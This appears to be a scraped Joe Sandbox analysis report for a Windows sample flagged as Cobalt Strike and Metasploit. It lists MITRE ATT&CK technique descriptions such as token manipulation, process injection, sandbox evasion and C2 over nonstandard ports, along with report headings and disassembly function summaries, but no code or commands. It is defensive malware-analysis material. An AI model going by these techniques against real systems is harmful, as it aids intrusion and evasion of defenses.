Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2HSalvXIJE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Threatname: Metasploit

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Windows Analysis Report
2HSalvXIJE.exe

Function 03A9E68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165
networkfileCOMMONLIBRARYCODE

Function 00401180 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 196
sleepstringCOMMON

Function 03AA5E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Function 03A91184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50
pipefileCOMMON

Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54
threadCOMMON

Function 03A9CA74 Relevance: 7.8, APIs: 6, Instructions: 296
COMMONLIBRARYCODE

Function 000D0128 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
networkmemoryfileCOMMON

Function 03A9F014 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Function 000D02EB Relevance: 3.1, APIs: 2, Instructions: 51
memoryfilenetworkCOMMON

Function 000D02FB Relevance: 3.0, APIs: 2, Instructions: 50
memoryfilenetworkCOMMON

Function 000D0109 Relevance: 1.5, APIs: 1, Instructions: 40
networkCOMMON

Function 000D02D2 Relevance: 1.5, APIs: 1, Instructions: 30
filenetworkCOMMON